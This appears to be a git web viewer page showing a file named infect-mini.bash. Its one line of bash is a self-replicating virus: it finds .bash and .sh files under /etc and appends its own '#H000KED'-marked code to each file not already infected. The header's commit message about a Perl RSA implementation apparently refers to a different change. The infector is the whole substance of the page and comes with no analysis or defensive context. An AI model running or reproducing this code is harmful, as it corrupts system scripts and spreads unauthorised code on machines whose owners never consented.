Added my simple RSA implementation written in PERL for study purposes - it's INSECURE!
[mirrors/Programs.git] / bash / infect / infect-mini.bash
1 for i in $( find /etc 2> /dev/null | grep -i "\.bash\$\|\.sh\$" ); do if ( fgrep "\#H000KED" $i > /dev/null ); then continue; fi; echo >> $i; cat $0 | grep \#H000KED >> $i; done;
This page took 0.233461 seconds and 4 git commands to generate.